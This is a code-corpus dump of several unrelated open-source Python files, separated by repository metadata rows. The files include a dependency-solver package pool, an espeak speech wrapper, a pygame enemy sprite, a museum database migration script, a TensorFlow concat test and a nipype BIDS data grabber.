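# by default; no particular asset name is assumed.
def _example_read_first_asset():
    apk = APK()
    names = apk.list()          # unprefixed names under "assets/"
    if not names:
        return None
    f = apk.open(names[0])      # behaves like a read-only file object
    try:
        return f.read()
    finally:
        f.close()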
| lgpl-2.1 | 7,976,596,062,115,813,000 | 21.683908 | 87 | 0.478085 | false | 4.464932 | false | false | false |
enthought/depsolver | depsolver/pool.py | 1 | 8318 | import collections
from .bundled.traitlets \
import \
HasTraits, Dict, Instance, List, Long, Unicode
from .errors \
import \
DepSolverError, MissingPackageInfoInPool
from .package \
import \
PackageInfo
from .repository \
import \
Repository
from .requirement \
import \
Requirement
from .utils \
import \
CachedScheduler
MATCH_NONE = 0
MATCH_NAME = 1
MATCH = 2
MATCH_PROVIDE = 3
MATCH_REPLACE = 4
class Pool(HasTraits):
"""Pool objects model a pool of repositories.
Pools are able to find packages that provide a given requirements (handling
the provides concept from package metadata).
"""
repositories = List(Instance(Repository))
_packages_by_id = Dict()
_packages_by_name = Dict()
_id = Long(1)
_repository_by_name = Instance(collections.defaultdict)
_scheduler = Instance(CachedScheduler)
def __init__(self, repositories=None, **kw):
scheduler = CachedScheduler()
repository_by_name = collections.defaultdict(list)
super(Pool, self).__init__(self, _scheduler=scheduler,
_repository_by_name=repository_by_name, **kw)
if repositories is None:
repositories = []
# provide.name -> package mapping
self._packages_by_name = collections.defaultdict(list)
if len(repositories) > 0:
for repository in repositories:
self.add_repository(repository)
def has_package(self, package):
package_id = package.id
return package_id in self._packages_by_id
def add_repository(self, repository):
"""Add a repository to this pool.
Arguments
---------
repository: Repository
repository to add
"""
self.repositories.append(repository)
self._repository_by_name[repository.name].append(repository)
for package in repository.iter_packages():
package.id = self._id
self._id += 1
self._packages_by_id[package.id] = package
self._packages_by_name[package.name].append(package)
for provide in package.provides:
self._packages_by_name[provide.name].append(package)
for replace in package.replaces:
self._packages_by_name[replace.name].append(package)
def package_by_id(self, package_id):
"""Retrieve a package from its id.
Arguments
---------
package_id: str
A package id
"""
try:
return self._packages_by_id[package_id]
except KeyError:
raise MissingPackageInfoInPool(package_id)
def what_provides(self, requirement, mode='composer'):
"""Returns a list of packages that provide the given requirement.
Arguments
---------
requirement: Requirement
the requirement to match
mode: str
One of the following string:
- 'composer': behaves like Composer does, i.e. only returns
packages that match this requirement directly, unless no
match is found in which case packages that provide the
requirement indirectly are returned.
- 'direct_only': only returns packages that match this
requirement directly (i.e. provides are ignored).
- 'include_indirect': only returns packages that match this
requirement directly or indirectly (i.e. includes packages
that provides this package)
"""
# FIXME: this is conceptually copied from whatProvides in Composer, but
# I don't understand why the policy of preferring non-provided over
# provided packages is handled here.
        if mode not in ['composer', 'direct_only', 'include_indirect']:
raise ValueError("Invalid mode %r" % mode)
strict_matches = []
provided_match = []
name_match = False
for package in self._packages_by_name[requirement.name]:
match = self.matches(package, requirement)
if match == MATCH_NONE:
pass
elif match == MATCH_NAME:
name_match = True
elif match == MATCH:
name_match = True
strict_matches.append(package)
elif match == MATCH_PROVIDE:
provided_match.append(package)
elif match == MATCH_REPLACE:
strict_matches.append(package)
else:
raise ValueError("Invalid match type: {}".format(match))
if mode == 'composer':
if name_match:
return strict_matches
else:
return strict_matches + provided_match
elif mode == 'direct_only':
return strict_matches
elif mode == 'include_indirect':
return strict_matches + provided_match
def matches(self, candidate, requirement):
"""Checks whether the candidate package matches the requirement, either
directly or through provides.
Arguments
---------
candidate: PackageInfo
Candidate package
requirement: Requirement
The requirement to match
Returns
-------
match_type: _Match or False
An instance of Match, that specified the type of match:
- if only the name matches, will be MATCH_NAME
- if the name and version actually match, will be MATCH
- if the match is through the package's provides, will be MATCH_PROVIDE
- if no match at all, will be False
Examples
--------
>>> from depsolver import PackageInfo, Requirement
>>> R = Requirement.from_string
>>> pool = Pool()
>>> pool.matches(PackageInfo.from_string('numpy-1.3.0'), R('numpy >= 1.2.0')) == MATCH
True
"""
if requirement.name == candidate.name:
candidate_requirement = Requirement.from_package_string(candidate.unique_name, candidate.version_factory)
if requirement.is_universal or candidate_requirement.matches(requirement):
return MATCH
else:
return MATCH_NAME
else:
for provide in candidate.provides:
if requirement.matches(provide):
return MATCH_PROVIDE
for replace in candidate.replaces:
if requirement.matches(replace):
return MATCH_REPLACE
return MATCH_NONE
def id_to_string(self, package_id):
"""
Convert a package id to a nice string representation.
"""
package = self.package_by_id(abs(package_id))
if package_id > 0:
return "+" + str(package)
else:
return "-" + str(package)
#------------------------
# Repository priority API
#------------------------
def set_repository_order(self, repository_name, after=None, before=None):
candidates = self._repository_by_name[repository_name]
if len(candidates) < 1:
raise DepSolverError("No repository with name '%s'" % (repository_name,))
else:
self._scheduler.set_constraints(repository_name, after, before)
def repository_priority(self, repository):
"""
Returns the priority of a repository.
Priorities are in the ]-inf, 0] integer range, and the ordering is the
same as integers: the lower the priority number, the less a repository
has priority over other repositories.
If no constraint has been set up for the repository, its priority is 0.
Parameters
----------
repository: Repository
The repository to compute the priority of.
"""
if repository.name in self._repository_by_name:
priorities = self._scheduler.compute_priority()
# We return a negative number to follow Composer convention.
return priorities.get(repository.name, 0) - (len(priorities) - 1)
else:
raise DepSolverError("Unknown repository name '%s'" % (repository.name,))
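# Usage sketch. PackageInfo.from_string and Requirement.from_string are the
# constructors already used in the doctest above; the Repository("main", ...)
# call is an assumption about its signature, not a documented API.
def _example_what_provides():
    repo = Repository("main", [PackageInfo.from_string("numpy-1.3.0")])
    pool = Pool()
    pool.add_repository(repo)
    return pool.what_provides(Requirement.from_string("numpy >= 1.2.0"))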
| bsd-3-clause | -270,076,686,273,748,060 | 33.658333 | 117 | 0.583914 | false | 4.797001 | false | false | false |
pmoleri/memorize-accesible | speak/espeak_cmd.py | 1 | 2079 | # This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import re
import subprocess
import logging
logger = logging.getLogger('speak')
import espeak
PITCH_MAX = 99
RATE_MAX = 99
PITCH_DEFAULT = PITCH_MAX/2
RATE_DEFAULT = RATE_MAX/3
class AudioGrabCmd(espeak.BaseAudioGrab):
def speak(self, status, text):
self.make_pipeline('filesrc name=file-source')
# espeak uses 80 to 370
rate = 80 + (370-80) * int(status.rate) / 100
wavpath = "/tmp/speak.wav"
subprocess.call(["espeak", "-w", wavpath, "-p", str(status.pitch),
"-s", str(rate), "-v", status.voice.name, text],
stdout=subprocess.PIPE)
self.stop_sound_device()
# set the source file
self.pipeline.get_by_name("file-source").props.location = wavpath
# play
self.restart_sound_device()
def voices():
out = []
result = subprocess.Popen(["espeak", "--voices"], stdout=subprocess.PIPE) \
.communicate()[0]
for line in result.split('\n'):
m = re.match(r'\s*\d+\s+([\w-]+)\s+([MF])\s+([\w_-]+)\s+(.+)', line)
if not m:
continue
language, gender, name, stuff = m.groups()
if stuff.startswith('mb/') or \
name in ('en-rhotic','english_rp','english_wmids'):
# these voices don't produce sound
continue
out.append((language, name))
return out
| gpl-2.0 | -3,199,728,626,601,833,000 | 31.484375 | 79 | 0.634921 | false | 3.719141 | false | false | false |
gfrances/model-based-social-simulations | experiments/all-agents-simple.py | 1 | 1661 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
import argparse
# from experiments.src.exp import AggregateExperiment, MDPAgentConfiguration, SingleExperiment
from src.sequential_taskgen import SequentialTaskgen
from src.experiment import AggregateExperiment, MDPAgentConfiguration, SingleExperiment, LazyAgentConfiguration, \
RandomAgentConfiguration, GreedyAgentConfiguration, MotionlessAgentConfiguration
def main():
"""
A simple single-run experiment comparing the performance of 10 units of each of our agent types.
"""
exp = AggregateExperiment(parse_arguments())
pop = 10
mdp = MDPAgentConfiguration(population=pop, horizon=6, width=1000)
lazy = LazyAgentConfiguration(population=pop, alpha=0.7)
random = RandomAgentConfiguration(population=pop)
greedy = GreedyAgentConfiguration(population=pop)
motionless = MotionlessAgentConfiguration(population=pop)
exp.add_single(SingleExperiment(timesteps=200, runs=1, simulation_map='r25_i0',
label="all", agents=[mdp, lazy, random, greedy, motionless]))
exp.bootstrap()
t = SequentialTaskgen(exp)
t.run()
def parse_arguments():
parser = argparse.ArgumentParser(description='Generate experiment task runners.')
parser.add_argument("--name", help='The name/ID we want to give to the experiment', default='all-agents')
parser.add_argument("--timeout", help='Maximum timeout allowed, in seconds', type=int, default='0')
parser.add_argument("--mem", help='Maximum memory allowed, in GB', default='0', type=int)
args = parser.parse_args()
return args
if __name__ == "__main__":
main()
| gpl-2.0 | -2,915,125,925,642,806,000 | 38.547619 | 114 | 0.718844 | false | 4.071078 | true | false | false |
keithfancher/Blobulous | blobulous/enemy.py | 1 | 3919 | # Copyright 2011, 2012 Keith Fancher
#
# This file is part of Blobulous.
#
# Blobulous is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Blobulous is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Blobulous. If not, see <http://www.gnu.org/licenses/>.
import random
import pygame
import settings as s
from explosion import Explosion
class Enemy(pygame.sprite.Sprite):
def __init__(self, explosion_container, *containers):
# Call the parent's constructor
pygame.sprite.Sprite.__init__(self, containers)
# Set speed vector
self.delta_x = 0
self.delta_y = 0
# Whether this enemy is currently targeted by the player
self.targeted = False
# Used by the circle collision detection. Allows a slightly smaller and
# more accurate hit "box".
self.radius = 21
# Load the image
self.image = pygame.image.load("images/enemy.png").convert()
self.image.set_colorkey(pygame.Color('black'))
self.rect = self.image.get_rect()
# Need to pass the enemy a sprite group to contain its explosion after
# it's destroyed, so the explosion can live on after the enemy has long
# since bitten the dust
self.explosion_container = explosion_container
self.random_spawn()
def update(self):
"""Update enemy position"""
self.rect.top += self.delta_y
self.rect.left += self.delta_x
self.kill_if_offscreen() # Destroy object if offscreen
def kill(self):
"""Override Sprite.kill() so enemies (and their descendent classes)
will explode instead of just disappearing"""
Explosion(self.rect.center, self.explosion_container)
pygame.sprite.Sprite.kill(self)
def kill_if_offscreen(self):
"""Kill any enemies that go more than 60 pixels off the screen"""
if self.rect.left < -60 or self.rect.left > s.SCREEN_W + 60:
self.kill()
elif self.rect.top < -60 or self.rect.top > s.SCREEN_H + 60:
self.kill()
def random_spawn(self):
"""Spawns somewhere off the screen with random direction and speed"""
# Directional constants... makes this shit a bit easier to read
TOP = 0
BOTTOM = 1
LEFT = 2
RIGHT = 3
# At top of screen, bottom, left, or right
spawn_location = random.randint(0, 3)
if spawn_location == TOP:
self.rect.left = random.randint(0, s.SCREEN_W - self.rect.width)
self.rect.bottom = 0
self.delta_x = random.randint(-5, 5)
self.delta_y = random.randint(1, 5) # gotta move down
elif spawn_location == BOTTOM:
self.rect.left = random.randint(0, s.SCREEN_W - self.rect.width)
self.rect.top = s.SCREEN_H
self.delta_x = random.randint(-5, 5)
self.delta_y = random.randint(-5, -1) # gotta move up
elif spawn_location == LEFT:
self.rect.right = 0
self.rect.top = random.randint(0, s.SCREEN_H - self.rect.height)
self.delta_x = random.randint(1, 5) # gotta move right
self.delta_y = random.randint(-5, 5)
elif spawn_location == RIGHT:
self.rect.left = s.SCREEN_W
self.rect.top = random.randint(0, s.SCREEN_H - self.rect.height)
self.delta_x = random.randint(-5, -1) # gotta move left
self.delta_y = random.randint(-5, 5)
| gpl-3.0 | 157,451,090,156,659,620 | 35.287037 | 79 | 0.628987 | false | 3.725285 | false | false | false |
Beit-Hatfutsot/dbs-back | scripts/migrate.py | 1 | 16413 | # -*- coding: utf-8 -*-
import re
import os
import sys
import logging
from argparse import ArgumentParser
from decimal import Decimal
import datetime
import calendar
import time
from functools import partial
from pymongo import MongoClient
from pymongo.errors import BulkWriteError
from bson.code import Code
from gedcom import Gedcom, GedcomParseError
from migration.migration_sqlclient import MigrationSQLClient
from migration.tasks import update_row
from migration.files import upload_photo
from migration.family_trees import Gedcom2Persons
from bhs_api.utils import get_migrate_conf, create_thumb, get_unit_type
from bhs_api import phonetic
from bhs_api.item import get_collection_id_field
conf = get_migrate_conf(('queries_repo_path', 'sql_server', 'sql_user', 'sql_password',
'collections_to_migrate', 'sql_db', 'photos_mount_point', 'movies_mount_point',
'gentree_mount_point', 'gentree_bucket_name', 'photos_bucket_name', 'movies_bucket_name'))
sqlClient = MigrationSQLClient(conf.sql_server, conf.sql_user, conf.sql_password, conf.sql_db)
logging.basicConfig(level=logging.INFO,
format='%(asctime)-15s %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
logger = logging.getLogger('scripts.migrate')
logger.setLevel(logging.getLevelName('INFO'))
repeated_slugs = {'He': {}, 'En': {}}
split = lambda x: re.split(',|\||;| ', x)
def parse_args():
parser = ArgumentParser()
parser.add_argument('-c', '--collection')
parser.add_argument('--host', default='localhost')
parser.add_argument('-s', '--since', default=0)
parser.add_argument('-u', '--until', default=calendar.timegm(time.localtime()))
parser.add_argument('-i', '--unitid', type=int,
help='migrate a specifc unit/tree id')
parser.add_argument('-g', '--gedcom_path',
help='file path to a gedcom file. works only when -i XXX -c genTrees is used')
parser.add_argument('--lasthours',
help="migrate all content changed in the last LASTHOURS")
parser.add_argument('--dryrun', help="don't update data, just print what will be done")
return parser.parse_args()
def get_now_str():
format = '%d.%h-%H:%M:%S'
now = datetime.datetime.now()
now_str = datetime.datetime.strftime(now, format)
return now_str
def get_queries(collection_name=None, repo_path=conf.queries_repo_path):
''' return a dictionary with values of MSSQL query template and filenames
keys.
:param collection_name: the name of the collection, if False or missing
return the queries for all the collections
:param repo_path: where all the files are. defaults to the value from
the conf file
'''
queries = {}
if repo_path[-1] != '/':
repo_path = repo_path + '/'
if collection_name:
filenames = [collection_name + '.sql']
else:
# No single collection specified, migrating all the collections from conf
filenames = [col_name + '.sql' for col_name in conf.collections_to_migrate]
for filename in filenames:
try:
fh = open(os.path.join(repo_path, filename))
except IOError:
logger.error('Could not open file \'{}\' in {}.'.format(filename,
os.getcwd())
)
sys.exit(1)
queries[filename[:-4]] = fh.read()
fh.close()
return queries
def make_array(val, to_int=False):
''' make an array from a string of values separated by ',', '|' or ' ' '''
    if val is None:
return []
else:
if not to_int:
return split(val[:-1])
else:
try:
return [int(x) for x in split(val[:-1])]
except ValueError:
logger.error('Value error while converting {}'.format(val))
return []
def make_subdocument_array(doc_arr, key, val_string):
returned_arr = doc_arr
    if val_string is None:
        return returned_arr
    elif len(val_string) > 10000:
        logger.error('Given string is too long for key {}!'.format(key))
        return returned_arr
sub_values = make_array(val_string)
for i in range(len(sub_values)):
val = sub_values[i]
if i >= len(returned_arr):
returned_arr.append({})
if is_lang_aware_key(key):
lang_prefix = key[:2]
lang_agnostic_key = key[2:]
if lang_agnostic_key in returned_arr[i]:
returned_arr[i][lang_agnostic_key][lang_prefix] = val
else:
doc = {}
doc[lang_prefix] = val
returned_arr[i][lang_agnostic_key] = doc
else:
returned_arr[i][key] = val
return returned_arr
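# Illustrative example of the folding performed above (field names and
# values are made up, the shapes are what matters).
def _example_make_subdocument_array():
    arr = make_subdocument_array([], 'PlaceIds', '3|7|')
    arr = make_subdocument_array(arr, 'EnPlaceTypeCodesDesc', 'City|Town|')
    # arr == [{'PlaceIds': '3', 'PlaceTypeCodesDesc': {'En': 'City'}},
    #         {'PlaceIds': '7', 'PlaceTypeCodesDesc': {'En': 'Town'}}]
    return arr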
def is_lang_aware_key(key):
lang_prefix = key[:2]
if lang_prefix == 'He' or lang_prefix == 'En':
return True
return False
def parse_common(doc):
parsed_doc = {}
parsed_doc['Attachments'] = []
parsed_doc['UnitPlaces'] = []
parsed_doc['Pictures'] = []
for key, val in doc.items():
if isinstance(val, Decimal):
parsed_doc[key] = float(val)
continue
elif isinstance(val, str):
try:
parsed_doc[key] = val.decode('utf-8')
except UnicodeDecodeError:
try:
if key == 'TS':
parsed_doc[key] = val.encode('hex')
continue
except:
logger.warning('failed to migrate key: %s' % key)
except:
logger.warning('failed to migrate key: %s' % key)
if key == 'LexiconIds':
parsed_doc[key] = make_array(val)
elif key in ('AttachmentFileName', 'AttachmentPath', 'AttachmentNum'):
parsed_doc['Attachments'] = make_subdocument_array(
parsed_doc['Attachments'], key, val)
elif key in ('PlaceIds', 'PlaceTypeCodes', 'EnPlaceTypeCodesDesc',
'HePlaceTypeCodesDesc'):
parsed_doc['UnitPlaces'] = make_subdocument_array(
parsed_doc['UnitPlaces'], key, val)
elif key in ('PictureId', 'IsPreview'):
parsed_doc['Pictures'] = make_subdocument_array(
parsed_doc['Pictures'], key, val)
elif is_lang_aware_key(key):
lang_prefix = key[:2]
lang_agnostic_key = key[2:]
if lang_agnostic_key in parsed_doc:
try:
parsed_doc[lang_agnostic_key][lang_prefix] = val
except:
d = {}
d[lang_prefix] = val
parsed_doc[lang_agnostic_key] = d
else:
d = {}
d[lang_prefix] = val
parsed_doc[lang_agnostic_key] = d
else:
parsed_doc[key] = val
return parsed_doc
def parse_image_unit(doc):
image_unit_doc = parse_common(doc)
image_unit_doc['PreviewPics'] = []
image_unit_doc['UnitPersonalities'] = []
image_unit_doc['UnitPeriod'] = []
image_unit_doc['Exhibitions'] = []
if not image_unit_doc.has_key('Pictures'):
image_unit_doc['Pictures'] = []
for key, val in doc.items():
if key in ('IsPreviewPreview', 'PrevPictureId'):
image_unit_doc['PreviewPics'] = make_subdocument_array(image_unit_doc['PreviewPics'], key, val)
elif key in ('PersonalityId', 'PersonalityType', 'EnPersonalityTypeDesc', 'HePersonalityTypeDesc', 'PerformerType', 'EnPerformerTypeDesc', 'HePerformerTypeDesc', 'OrderBy'):
image_unit_doc['UnitPersonalities'] = make_subdocument_array(image_unit_doc['UnitPersonalities'], key, val)
elif key in ('PicId', 'OldPictureNumber', 'PictureTypeCode', 'EnPictureTypeDesc', 'HePictureTypeDesc', 'Resolution', 'NegativeNumber', 'PictureLocation', 'LocationCode', 'ToScan', 'ForDisplay', 'IsLandscape'):
image_unit_doc['Pictures'] = make_subdocument_array(image_unit_doc['Pictures'], key, val)
elif key in ('PeriodNum', 'PeriodTypeCode', 'EnPeriodTypeDesc', 'HePeriodTypeDesc', 'PeriodDateTypeCode', 'EnPeriodDateTypeDesc', 'HePeriodDateTypeDesc', 'PeriodStartDate', 'PeriodEndDate', 'EnPeriodDesc', 'HePeriodDesc'):
image_unit_doc['UnitPeriod'] = make_subdocument_array(image_unit_doc['UnitPeriod'], key, val)
elif key in ('ExhibitionId', 'ExhibitionIsPreview'):
image_unit_doc['Exhibitions'] = make_subdocument_array(image_unit_doc['Exhibitions'], key, val)
elif key in ('AttachmentFileName', 'AttachmentPath', 'AttachmentNum'):
image_unit_doc['Attachments'] = make_subdocument_array(image_unit_doc['Attachments'], key, val)
elif key in ('SourceIds', 'PIctureReceived'):
# REALLY PIctureReceived?!
image_unit_doc[key] = make_array(val)
return image_unit_doc
def parse_image(doc):
image_doc = doc.copy()
# create thumbnail and attach to document
thumb_binary = create_thumb(image_doc, conf.photos_mount_point)
if thumb_binary:
image_doc['bin'] = thumb_binary
return image_doc
def parse_person(doc):
indi_doc = {}
for key, val in doc.items():
if key in ('BIRT_PLAC', 'MARR_PLAC', 'DEAT_PLAC'):
indi_doc[key] = val
if val:
indi_doc[key + '_lc'] = val.lower()
else:
indi_doc[key + '_lc'] = val
elif key in ['MSD', 'MED']:
indi_doc[key] = make_array(val, to_int=True)
elif key =='name':
indi_doc[key] = val
indi_doc['name_lc'] = map(unicode.lower, val)
indi_doc['name_S'] = map(phonetic.get_bhp_soundex, val)
else:
indi_doc[key] = val
if key in ('BIRT_PLAC', 'MARR_PLAC', 'DEAT_PLAC'):
indi_doc[key + '_S'] = phonetic.get_bhp_soundex(val)
return indi_doc
def parse_identity(doc):
return doc
def parse_synonym(doc):
parsed = {}
parsed['_id'] = doc['SynonymKey']
if doc['LanguageCode'] == 0:
parsed['lang'] = 'En'
else:
parsed['lang'] = 'He'
parsed['s_group'] = doc['Num']
parsed['str'] = doc['Synonym']
parsed['str_lc'] = doc['Synonym'].lower()
return parsed
def parse_doc(doc, collection_name):
collection_procedure_map = {
'places': parse_common,
'familyNames': parse_common,
'lexicon': parse_common,
'photoUnits': parse_image_unit,
'photos': parse_image,
'persons': parse_person,
'synonyms': parse_synonym,
'personalities': parse_common,
'movies': parse_common,
}
return collection_procedure_map[collection_name](doc)
def parse_n_update(row, collection_name, dryrun=False):
doc = parse_doc(row, collection_name)
id_field = get_collection_id_field(collection_name)
logger.info('{}:Updating {}: {}, updated {}'.format(
collection_name, id_field, doc[id_field],
doc.get('UpdateDate', '?')))
if not dryrun:
update_row.delay(doc, collection_name)
return doc
def get_file_descriptors(tree, gedcom_path):
''' returns both the file_id and the full file name of the gedcom file '''
if not gedcom_path:
gedcom_path = tree['GenTreePath']
file_id = os.path.split(gedcom_path)[-1].split('.')[0]
file_name = os.path.join(conf.gentree_mount_point,
gedcom_path)
return file_id, file_name
def migrate_trees(cursor, only_process_treenum=None, gedcom_path=None, on_save=None, dryrun=False):
''' get command line arguments and sql query and initiated update_tree
and update_row celery tasks.
returns how many people migrated
'''
collection_name = "persons"
row_number = 0
filtered_rows = filter(lambda row: not only_process_treenum or row['GenTreeNumber'] == only_process_treenum, cursor)
for row_number, row in enumerate(filtered_rows, start=1):
file_id, file_name = get_file_descriptors(row, gedcom_path)
try:
gedcom_fd = open(file_name)
except IOError, e:
logger.error('failed to open gedocm file tree number {}, path {}: {}'.format(row['GenTreeNumber'], file_name, str(e)))
else:
try:
g = Gedcom(fd=gedcom_fd)
except (SyntaxError, GedcomParseError) as e:
logger.error('failed to parse tree number {}, path {}: {}'.format(row['GenTreeNumber'], file_name, str(e)))
else:
logger.info('>>> migrating tree {}, path {}'.format(row['GenTreeNumber'], file_name))
if on_save and dryrun:
raise Exception("dryrun is not supported with on_save")
else:
on_save = partial(parse_n_update, collection_name=collection_name, dryrun=dryrun) if not on_save else on_save
Gedcom2Persons(g, row['GenTreeNumber'], file_id, on_save)
logger.info('<<< migrated tree {}, path {}'.format(row['GenTreeNumber'], file_name))
return row_number
if __name__ == '__main__':
args = parse_args()
until = int(args.until)
since_file = None
if not args.since:
if args.lasthours:
past = datetime.datetime.now() -\
datetime.timedelta(hours=int(args.lasthours))
since = calendar.timegm(past.timetuple())
else:
try:
since_file = open('/var/run/bhs/last_update', 'r+')
since = since_file.read()
since = int(since) + 1
except IOError:
since_file = None
since = 0
else:
since = int(args.since)
collection = args.collection
queries = get_queries(collection)
logger.info('looking for changed items in {}-{}'.format(since, until))
photos_to_update = []
for collection_name, query in queries.items():
if collection_name == 'genTrees':
# the family trees get special treatment
# TODO: don't give them special treatment..
# this is called "persons" collection in mongo / ES
# TODO: have all places refer to it as "persons" instead of variations on genTrees / ftrees etc..
tree_nums = [args.unitid] if args.unitid else None
sql_cursor = sqlClient.execute(query, since=since, until=until)
count = migrate_trees(sql_cursor, args.unitid, args.gedcom_path, dryrun=args.dryrun)
if not count:
logger.info('{}:Skipping'.format(collection_name))
else:
if args.unitid:
sql_cursor = sqlClient.execute(query, unit_ids=[args.unitid])
else:
sql_cursor = sqlClient.execute(query, since=since, until=until)
if sql_cursor:
for row in sql_cursor:
doc = parse_n_update(row, collection_name, dryrun=args.dryrun)
# collect all the photos
pictures = doc.get('Pictures', None)
if pictures:
for pic in pictures:
if 'PictureId' in pic:
photos_to_update.append(pic['PictureId'])
else:
logger.warn('failed getting updated units {}:{}'
.format(collection_name, ','.join(units)))
# TODO:
# rsync_media(collection_name)
# update photos
if len(photos_to_update) > 0:
photos_query = get_queries('photos')['photos']
photos_cursor = sqlClient.execute(photos_query,
unit_ids=photos_to_update,
)
for row in photos_cursor:
upload_photo(row, conf, dryrun=args.dryrun)
if since_file and not args.dryrun:
since_file.seek(0)
since_file.write(str(until))
since_file.close()
logger.info("closing sql connection...")
sqlClient.close_connections()
| agpl-3.0 | -3,581,223,935,101,060,000 | 38.26555 | 230 | 0.570767 | false | 3.824983 | false | false | false |
ppries/tensorflow | tensorflow/python/kernel_tests/large_concat_op_test.py | 1 | 1511 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Functional tests for Concat Op."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
class LargeConcatOpTest(tf.test.TestCase):
"""Tests that belong in concat_op_test.py, but run over large tensors."""
def testConcatLargeTensors(self):
# CPU-only test, because it fails on GPUs with <= 4GB memory.
with tf.device("/cpu:0"):
a = tf.ones([2**31 + 6], dtype=tf.int8)
b = tf.zeros([1024], dtype=tf.int8)
onezeros = tf.concat_v2([a, b], 0)
with self.test_session(use_gpu=False):
# TODO(dga): Add more depth to this test to validate correctness,
# not just non-crashingness, once other large tensor fixes have gone in.
_ = onezeros.eval()
if __name__ == "__main__":
tf.test.main()
| apache-2.0 | -2,734,721,287,931,328,500 | 37.74359 | 80 | 0.667108 | false | 3.89433 | true | false | false |
mick-d/nipype | nipype/interfaces/bids_utils.py | 3 | 5108 | # -*- coding: utf-8 -*-
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
""" Set of interfaces that allow interaction with BIDS data. Currently
available interfaces are:
BIDSDataGrabber: Query data from BIDS dataset using pybids grabbids.
Change directory to provide relative paths for doctests
>>> import os
>>> filepath = os.path.dirname( os.path.realpath( __file__ ) )
>>> datadir = os.path.realpath(os.path.join(filepath, '../testing/data'))
>>> os.chdir(datadir)
"""
from os.path import join, dirname
import json
from .. import logging
from .base import (traits,
DynamicTraitedSpec,
Directory,
BaseInterface,
isdefined,
Str,
Undefined)
have_pybids = True
try:
from bids import grabbids as gb
except ImportError:
have_pybids = False
LOGGER = logging.getLogger('workflows')
class BIDSDataGrabberInputSpec(DynamicTraitedSpec):
base_dir = Directory(exists=True,
desc='Path to BIDS Directory.',
mandatory=True)
output_query = traits.Dict(key_trait=Str,
value_trait=traits.Dict,
desc='Queries for outfield outputs')
raise_on_empty = traits.Bool(True, usedefault=True,
desc='Generate exception if list is empty '
'for a given field')
return_type = traits.Enum('file', 'namedtuple', usedefault=True)
class BIDSDataGrabber(BaseInterface):
""" BIDS datagrabber module that wraps around pybids to allow arbitrary
querying of BIDS datasets.
Examples
--------
By default, the BIDSDataGrabber fetches anatomical and functional images
from a project, and makes BIDS entities (e.g. subject) available for
filtering outputs.
>>> bg = BIDSDataGrabber()
>>> bg.inputs.base_dir = 'ds005/'
>>> bg.inputs.subject = '01'
>>> results = bg.run() # doctest: +SKIP
Dynamically created, user-defined output fields can also be defined to
return different types of outputs from the same project. All outputs
are filtered on common entities, which can be explicitly defined as
infields.
>>> bg = BIDSDataGrabber(infields = ['subject'], outfields = ['dwi'])
>>> bg.inputs.base_dir = 'ds005/'
>>> bg.inputs.subject = '01'
>>> bg.inputs.output_query['dwi'] = dict(modality='dwi')
>>> results = bg.run() # doctest: +SKIP
"""
input_spec = BIDSDataGrabberInputSpec
output_spec = DynamicTraitedSpec
_always_run = True
def __init__(self, infields=None, **kwargs):
"""
Parameters
----------
infields : list of str
Indicates the input fields to be dynamically created
outfields: list of str
Indicates output fields to be dynamically created.
If no matching items, returns Undefined.
"""
super(BIDSDataGrabber, self).__init__(**kwargs)
if not isdefined(self.inputs.output_query):
self.inputs.output_query = {"func": {"modality": "func"},
"anat": {"modality": "anat"}}
# If infields is empty, use all BIDS entities
        if infields is not None and have_pybids:
bids_config = join(dirname(gb.__file__), 'config', 'bids.json')
bids_config = json.load(open(bids_config, 'r'))
infields = [i['name'] for i in bids_config['entities']]
self._infields = infields or []
# used for mandatory inputs check
undefined_traits = {}
for key in self._infields:
self.inputs.add_trait(key, traits.Any)
undefined_traits[key] = kwargs[key] if key in kwargs else Undefined
self.inputs.trait_set(trait_change_notify=False, **undefined_traits)
def _run_interface(self, runtime):
if not have_pybids:
raise ImportError(
"The BIDSEventsGrabber interface requires pybids."
" Please make sure it is installed.")
return runtime
def _list_outputs(self):
layout = gb.BIDSLayout(self.inputs.base_dir)
        # If an infield is not given an input value, silently ignore it
filters = {}
for key in self._infields:
value = getattr(self.inputs, key)
if isdefined(value):
filters[key] = value
outputs = {}
for key, query in self.inputs.output_query.items():
args = query.copy()
args.update(filters)
filelist = layout.get(return_type=self.inputs.return_type, **args)
if len(filelist) == 0:
msg = 'Output key: %s returned no files' % key
if self.inputs.raise_on_empty:
raise IOError(msg)
else:
LOGGER.warning(msg)
filelist = Undefined
outputs[key] = filelist
return outputs
| bsd-3-clause | -78,829,929,764,361,940 | 33.748299 | 79 | 0.584573 | false | 4.149472 | false | false | false |
bool-/btcbot | jsonrpc/authproxy.py | 1 | 3903 |
"""
Copyright 2011 Jeff Garzik
AuthServiceProxy has the following improvements over python-jsonrpc's
ServiceProxy class:
- HTTP connections persist for the life of the AuthServiceProxy object
(if server supports HTTP/1.1)
- sends protocol 'version', per JSON-RPC 1.1
- sends proper, incrementing 'id'
